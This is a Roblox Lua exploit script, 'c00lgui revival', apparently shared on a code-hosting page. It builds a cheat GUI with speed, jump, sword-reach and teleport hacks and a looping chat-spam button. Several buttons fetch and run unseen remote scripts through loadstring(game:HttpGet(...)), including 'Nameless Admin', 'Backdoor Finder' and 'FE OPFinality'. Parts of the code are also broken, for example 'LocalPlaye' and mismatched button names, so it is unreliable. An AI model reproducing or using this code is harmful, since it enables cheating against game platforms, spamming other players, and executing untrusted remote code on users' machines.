-- Gui To Lua

--[Made by Error333615 On Roblox]

-- v1.0

-- Instances :

local cka = Instance.new("ScreenGui")
local frame = Instance.new("Frame")
local titler = Instance.new("TextLabel")
local button = Instance.new("TextButton")
local button2 = Instance.new("TextButton")
local button3 = Instance.new("TextButton")
local button4 = Instance.new("TextButton")
local button5 = Instance.new("TextButton")
local button6 = Instance.new("TextButton")
local button7 = Instance.new("TextButton")
local button8 = Instance.new("TextButton")
local button9 = Instance.new("TextButton")
local button10 = Instance.new("TextButton")



local cope = Instance.new("TextButton")
local input = Instance.new("TextBox")

-- Propreties :

cka.Name = "cka"
cka.Parent = game.CoreGui

frame.Name = "frame"
frame.Parent = cka
frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
frame.BorderColor3 = Color3.fromRGB(255, 0, 0)
frame.BorderSizePixel = 3
frame.Position = UDim2.new(0,3,0.3,0)
frame.Size = UDim2.new(0, 300, 0, 400)

titler.Name = "titler"
titler.Parent = frame
titler.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
titler.BorderColor3 = Color3.fromRGB(255, 0, 0)
titler.BorderSizePixel = 3
titler.Size = UDim2.new(0, 300, 0, 40)
titler.Font = Enum.Font.SourceSans
titler.Text = "c00lgui revival v1 by Error333615"
titler.TextColor3 = Color3.fromRGB(255, 255, 255)
titler.TextSize = 24.000

button.Name = "button"
button.Parent = frame
button.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button.BorderColor3 = Color3.fromRGB(255, 0, 0)
button.BorderSizePixel = 3
button.Position = UDim2.new(0, 0, 0.100000001, 0)
button.Size = UDim2.new(0, 75, 0, 30)
button.Font = Enum.Font.SourceSans
button.Text = "Floating Pad"
button.TextColor3 = Color3.fromRGB(255, 255, 255)
button.TextSize = 14.000
button.TextWrapped = true
button.MouseButton1Down:connect(function()
        local name = game.Players.LocalPlayer.Name

	local p = Instance.new("Part")
	p.Parent = workspace
	p.Locked = true
	p.BrickColor = BrickColor.new("White")
	p.BrickColor = BrickColor.new(104)
	p.Size = Vector3.new(8, 1.2, 8)
	p.Anchored = true
	local m = Instance.new("CylinderMesh")
	m.Scale = Vector3.new(1, 0.5, 1)
	m.Parent = p
	while true do
		p.CFrame = CFrame.new(game.Players:findFirstChild(name).Character.Torso.CFrame.x, game.Players:findFirstChild(name).Character.Torso.CFrame.y - 4, game.Players:findFirstChild(name).Character.Torso.CFrame.z)
		wait()
	end
end)

button2.Name = "button"
button2.Parent = frame
button2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button2.BorderColor3 = Color3.fromRGB(255, 0, 0)
button2.BorderSizePixel = 3
button2.Position = UDim2.new(0.25, 0, 0.100000001, 0)
button2.Size = UDim2.new(0, 75, 0, 30)
button2.Font = Enum.Font.SourceSans
button2.Text = "Set Jumpower"
button2.TextColor3 = Color3.fromRGB(255, 255, 255)
button2.TextSize = 14.000
button2.TextWrapped = true
button2.MouseButton1Down:connect(function()
        game.Players.LocalPlayer.Character.Humanoid.JumpPower = cka.input.Text
end)

button3.Name = "button"
button3.Parent = frame
button3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button3.BorderColor3 = Color3.fromRGB(255, 0, 0)
button3.BorderSizePixel = 3
button3.Position = UDim2.new(0.5, 0, 0.100000001, 0)
button3.Size = UDim2.new(0, 75, 0, 30)
button3.Font = Enum.Font.SourceSans
button3.Text = "Nameless Admin"
button3.TextColor3 = Color3.fromRGB(255, 255, 255)
button3.TextSize = 14.000
button3.TextWrapped = true
button3.MouseButton1Down:connect(function()
        loadstring(game:HttpGet("https://[Log in to view URL]",true))()
end)

button4.Name = "button"
button4.Parent = frame
button4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button4.BorderColor3 = Color3.fromRGB(255, 0, 0)
button4.BorderSizePixel = 3
button4.Position = UDim2.new(0.5, 0, 0.847500026, 0)
button4.Size = UDim2.new(0, 75, 0, 30)
button4.Font = Enum.Font.SourceSans
button4.Text = "Click TP"
button4.TextColor3 = Color3.fromRGB(255, 255, 255)
button4.TextSize = 14.000
button4.TextWrapped = true
button4.MouseButton1Down:connect(function()
        mouse = game.Players.LocalPlaye:GetMouse()
        tool = Instance.new("Tool")
        tool.RequiresHandle = false
        tool.Name = "click tp by error333615"
        tool.Activated:connect(function()
                local pos = mouse.Hit+Vector3.new(0,2.5,0)
                pos = CFrame.new(pos.X,pos.Y,pos.Z)
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
        end)
        tool.Parent = game.Player.LocalPlayer.Backpack
end)
        
button5.Name = "button"
button5.Parent = frame
button5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button5.BorderColor3 = Color3.fromRGB(255, 0, 0)
button5.BorderSizePixel = 3
button5.Position = UDim2.new(0.5, 0, 0.847500026, 0)
button5.Size = UDim2.new(0, 75, 0, 30)
button5.Font = Enum.Font.SourceSans
button5.Text = "Anti Client Kick"
button5.TextColor3 = Color3.fromRGB(255, 255, 255)
button5.TextSize = 14.000
button5.TextWrapped = true
button5.MouseButton1Down:connect(function() 
      Notify({
      Description = "Anti kick executed";
      Title = "c00lgui";
      Duration = 5;

      })           
loadstring(game:HttpGet("https://[Log in to view URL]",true))()
end)
       
button6.Name = "button"
button6.Parent = frame
button6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button6.BorderColor3 = Color3.fromRGB(255, 0, 0)
button6.BorderSizePixel = 3
button6.Position = UDim2.new(0.75, 0, 0.100000001, 0)
button6.Size = UDim2.new(0, 75, 0, 30)
button6.Font = Enum.Font.SourceSans
button6.Text = "Set Spam Text"
button6.TextColor3 = Color3.fromRGB(255, 255, 255)
button6.TextSize = 14.000
button6.TextWrapped = true
button6.MouseButton1Down:connect(function()
        while true do wait (1.5)
            local args = {
                [1] = (button6.Parent.Parent.input.Text),
                [2] = "All"
            }

            game:GetService("ReplicatedStorage").DefaultChatSystemEvents.SayMessageRequest:FireServer(unpack(args))
    end

end)

button7.Name = "button"
button7.Parent = frame
button7.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button7.BorderColor3 = Color3.fromRGB(255, 0, 0)
button7.BorderSizePixel = 3
button7.Position = UDim2.new(-0.00333331339, 0, 0.175000012, 0)
button7.Size = UDim2.new(0, 75, 0, 30)
button7.Font = Enum.Font.SourceSans
button7.Text = "Backdoor Finder"
button7.TextColor3 = Color3.fromRGB(255, 255, 255)
button7.TextSize = 14.000
button7.TextWrapped = true
button7.MouseButton1Down:connect(function()
        loadstring(game:HttpGet("https://[Log in to view URL]",true))() 
end)

button2.Name = "button"
button8.Parent = frame
button8.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button8.BorderColor3 = Color3.fromRGB(255, 0, 0)
button8.BorderSizePixel = 3
button8.Position = UDim2.new(0.25, 0, 0.324999988, 0)
button8.Size = UDim2.new(0, 75, 0, 30)
button8.Font = Enum.Font.SourceSans
button8.Text = "Set WalkSpeed"
button8.TextColor3 = Color3.fromRGB(255, 255, 255)
button8.TextSize = 14.000
button8.TextWrapped = true
button8.MouseButton1Down:connect(function()
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = cka.input.Text
end)

button9.Name = "button"
button9.Parent = frame
button9.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button9.BorderColor3 = Color3.fromRGB(255, 0, 0)
button9.BorderSizePixel = 3
button9.Position = UDim2.new(0.5, 0, 0.474999994, 0)
button9.Size = UDim2.new(0, 75, 0, 30)
button9.Font = Enum.Font.SourceSans
button9.Text = "Set SwordReach"
button9.TextColor3 = Color3.fromRGB(255, 255, 255)
button9.TextSize = 14.000
button9.TextWrapped = true
button9.MouseButton1Down:connect(function()
        local reachsize = cka.input.Text
        local Tool = game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") or
Player.Backpack:FindFirstChildOfClass("Tool")
        if Tool:FindFirstChild("OGSize3") then
            Tool.Handle.Size = Tool.OGSize3.Value
            Tool.OGSize3:Destroy()
            Tool.Handle.FunTIMES:Destroy()
        end
        local val = Instance.new("Vector3Value", Tool)
        val.Name = "OGSize3"
        val.Value = Tool.Handle.Size
        local sb = Instance.new("SelectionBox")
        sb.Adornee = Tool.Handle
        sb.Name = "FunTIMES"
        sb.Parent = Tool.Handle
        Tool.Handle.Massless = true
        Tool.Handle.Size = Vector3.new(Tool.Handle.Size.X,Tool.Handle.Size.Y,reachsize)
end)

button10.Name = "button"
button10.Parent = frame
button10.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button10.BorderColor3 = Color3.fromRGB(255, 0, 0)
button10.BorderSizePixel = 3
button10.Position = UDim2.new(0.5, 0, 0.847500026, 0)
button10.Size = UDim2.new(0, 75, 0, 30)
button10.Font = Enum.Font.SourceSans
button10.Text = "FE OPFinality"
button10.TextColor3 = Color3.fromRGB(255, 255, 255)
button10.TextSize = 14.000
button10.TextWrapped = true
button10.MouseButton1Down:connect(function()
        loadstring(game:HttpGet("https://[Log in to view URL]",true))()
end)


        
cope.Name = "Close"
cope.Parent = cka
cope.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
cope.BorderColor3 = Color3.fromRGB(255, 0, 0)
cope.BorderSizePixel = 3
cope.Position = UDim2.new(0,3,0.3,380)
cope.Size = UDim2.new(0, 300, 0, 20)
cope.Font = Enum.Font.SourceSans
cope.Text = "Close"
cope.TextColor3 = Color3.fromRGB(255, 255, 255)
cope.TextSize = 18.000
cope.MouseButton1Down:connect(function()
        if cope.Text == "Close" then
                frame.Visible = false
                cope.Text = "Open" else
                frame.Visible = true
                cope.Text = "Close"
         end
end)

input.Name = "input"
input.Parent = cka
input.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
input.BorderColor3 = Color3.fromRGB(255, 0, 0)
input.BorderSizePixel = 3
input.Position = UDim2.new(0.804104507, 0, 0.965110958, 0)
input.Size = UDim2.new(0, 200, 0, 19)
input.Font = Enum.Font.SourceSans
input.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
input.PlaceholderText = "Input"
input.Text = ""
input.TextColor3 = Color3.fromRGB(255, 255, 255)
input.TextSize = 14.000
input.TextStrokeColor3 = Color3.fromRGB(255, 0, 0)
input.TextWrapped = true



local msg = Instance.new("Message",workspace)
msg.Text = "c00lgui revival has loaded !"
wait(5.8)
msg:Destroy()

Embed on website

To embed this project on your website, copy the following code and paste it into your website's HTML: